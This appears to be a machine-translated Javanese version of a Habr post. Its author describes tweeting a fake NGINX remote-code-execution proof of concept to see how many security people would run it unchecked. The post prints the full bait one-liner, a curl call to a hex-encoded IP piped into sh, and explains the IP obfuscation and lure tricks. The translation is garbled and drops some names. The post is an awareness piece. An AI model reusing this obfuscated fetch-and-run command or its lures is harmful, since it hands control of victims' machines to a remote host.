Cathetan. nerjemahake.: cathetan asli, diterbitake ing Juni 1, mutusakΓ© kanggo nindakake eksprimen ing antarane sing kasengsem ing keamanan informasi. Kanggo nindakake iki, dheweke nyiapake eksploitasi palsu kanggo kerentanan sing ora dingerteni ing server web lan dikirim ing Twitter. Asumsi-asumsi dheweke - supaya bisa langsung diekspos dening spesialis sing bakal weruh penipuan sing jelas ing kode kasebut - ora mung ora kelakon ... Dheweke ngluwihi kabeh pangarepan, lan ing arah sing ngelawan: tweet kasebut nampa dhukungan gedhe saka akeh wong sing ora nindakake. priksa isine.
TL; DR: Aja nggunakake pipelining file ing sh utawa bash ing kahanan apa wae. Iki minangka cara sing apik kanggo ilang kontrol komputer.
Aku pengin nuduhake karo sampeyan crita cekak babagan eksploitasi PoC komik sing digawe tanggal 31 Mei. Dheweke muncul kanthi cepet kanggo nanggepi kabar saka , anggota (ZDI), informasi babagan kerentanan ing NGINX sing ngarah menyang RCE (eksekusi kode jarak jauh) bakal diungkapake. Amarga NGINX nguwasani akeh situs web, kabar kasebut mesthi dadi bom. Nanging amarga wektu tundha ing proses "pambocoran tanggung jawab", rincian apa sing kedadeyan ora dingerteni - iki minangka prosedur ZDI standar.
babagan pambocoran kerentanan ing NGINX
Sawise rampung nggarap teknik obfuscation anyar ing curl, aku ngutip tweet asli lan "bocor PoC sing bisa digunakake" sing kalebu siji baris kode sing mesthine ngeksploitasi kerentanan sing ditemokake. Mesthi, iki omong kosong lengkap. Aku nganggep yen aku bakal langsung katon, lan paling apik aku bakal entuk sawetara retweet (oh uga).
karo eksploitasi palsu
Nanging, aku ora bisa mbayangno kedadeyan sabanjure. Popularitas tweetku meroket. Kaget, ing wayahe (15:00 wektu Moskow 1 Juni) sawetara wong sing ngerti yen iki palsu. Akeh wong sing retweet tanpa mriksa kabeh (apa maneh ngujo grafis ASCII sing apik banget).
Cukup katon carane ayu iku!
Nalika kabeh puteran lan werna iki apik, iku cetha sing wong kudu mbukak kode ing mesin kanggo ndeleng wong. Untunge, browser bisa digunakake kanthi cara sing padha, lan digabungake karo kasunyatan manawa aku ora pengin nemoni masalah hukum, kode sing dikubur ing situsku mung nggawe panggilan gema tanpa nyoba nginstal utawa nglakokake kode tambahan.
Digression cilik: , , aku lan kanca-kanca liyane saka tim Kita wis muter karo macem-macem cara kanggo obfuscate perintah curl kanggo sawetara wektu saiki amarga iku kelangan ... lan kita geeks. netspooky lan dnz nemokake sawetara cara anyar sing katon banget janjeni kanggo aku. Aku melu seneng-seneng lan nyoba nambah konversi IP desimal menyang tas trik. Pranyata IP uga bisa diowahi dadi format heksadesimal. Kajaba iku, curl lan umume alat NIX liyane seneng mangan IP heksadesimal! Dadi mung nggawe baris perintah sing yakin lan aman. Pungkasane aku mutusake babagan iki:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhostTeknik sosio-elektronik (SEE) - luwih saka mung phishing
Keamanan lan akrab minangka bagean utama saka eksperimen iki. Aku padha apa mimpin kanggo sukses kang. Baris perintah kasebut kanthi jelas nuduhake keamanan kanthi ngrujuk menyang "127.0.0.1" (localhost sing kondhang). Localhost dianggep aman lan data kasebut ora bakal ninggalake komputer sampeyan.
Familiarity minangka komponen SEE kunci nomer loro saka eksperimen kasebut. Wiwit target pamirsa utamane kalebu wong sing ngerti dhasar keamanan komputer, penting kanggo nggawe kode supaya bagean kasebut katon akrab lan akrab (lan mulane aman). Nyilih unsur konsep eksploitasi lawas lan nggabungake kanthi cara sing ora biasa wis kabukten sukses banget.
Ing ngisor iki ana analisis rinci babagan siji-liner. Kabeh ing dhaptar iki nganggo alam kosmetik, lan praktis ora ana sing dibutuhake kanggo operasi nyata.
Komponen apa sing pancene perlu? Iki -gsS, -O 0x0238f06a, |sh lan server web dhewe. Server web ora ngemot instruksi ala, nanging mung ngladeni grafis ASCII kanthi nggunakake printah echo ing naskah sing ana ing index.html. Nalika pangguna ngetik baris karo |sh ing tengah, index.html dimuat lan kaleksanan. Untunge, penjaga server web ora duwe niat ala.
-
../../../%00- nggantosi ngluwihi direktori; -
ngx_stream_module.so- path menyang modul NGINX acak; -
/bin/sh%00<'protocol:TCP'- kita mesthine diluncurake/bin/shing mesin target lan pangalihan output menyang saluran TCP; -
-O 0x0238f06a#PLToffset- bahan rahasia, ditambah#PLToffset, kanggo katon kaya ngimbangi memori Piye wae sing ana ing PLT; -
|sh;- pecahan penting liyane. Kita kudu ngarahake output menyang sh/bash supaya bisa nglakokake kode sing teka saka server web sing nyerang sing ana ing0x0238f06a(2.56.240.x); -
nc /dev/tcp/localhost- goblok kang netcat nuduhake/dev/tcp/localhostsupaya kabeh katon aman maneh. Nyatane, ora nindakake apa-apa lan kalebu ing baris kanggo kaendahan.
Iki nyimpulake dekoding naskah siji-baris lan diskusi babagan aspek "teknik sosial-elektronik" (phishing rumit).
Konfigurasi Server Web lan Penanggulangan
Amarga mayoritas pelangganku yaiku infosec / peretas, aku mutusake supaya server web rada tahan karo ekspresi "minat" ing bagean kasebut, supaya wong lanang duwe apa-apa (lan bakal nyenengake atur). Aku ora bakal nyathet kabeh pitfalls ing kene amarga eksperimen isih ditindakake, nanging ana sawetara perkara sing ditindakake dening server:
- Aktif ngawasi upaya distribusi ing jaringan sosial tartamtu lan ngganti macem-macem gambar cilik pratinjau kanggo nyengkuyung pangguna ngeklik link kasebut.
- Ngalihake Chrome/Mozilla/Safari/etc menyang video promosi Thugcrowd tinimbang nuduhake skrip cangkang.
- Watches kanggo pratandha OBVIOUS saka gangguan / hacking blatant, lan banjur wiwit redirecting panjalukan kanggo server NSA (ha!).
- Nginstal Trojan, uga rootkit BIOS, ing kabeh komputer sing pangguna ngunjungi host saka browser biasa (mung guyon!).
BagΓ©an cilik saka antimer
Ing kasus iki, tujuanku mung kanggo nguwasani sawetara fitur Apache - utamane, aturan sing apik kanggo pangalihan panjaluk - lan aku mikir: kenapa ora?
NGINX Exploit (Real!)
Langganan ing Twitter lan tindakake karya gedhe ZDI kanggo ngatasi kerentanan sing nyata lan ngeksploitasi kesempatan ing NGINX. Pakaryane mesthi nggumunake aku lan aku matur nuwun kanggo Alice amarga dheweke sabar karo kabeh sebutan lan kabar sing disebabake dening tweet bodhoku. Untunge, uga nindakake sawetara sing apik: mbantu nambah kesadaran babagan kerentanan NGINX, uga masalah sing disebabake penyalahgunaan curl.
Source: www.habr.com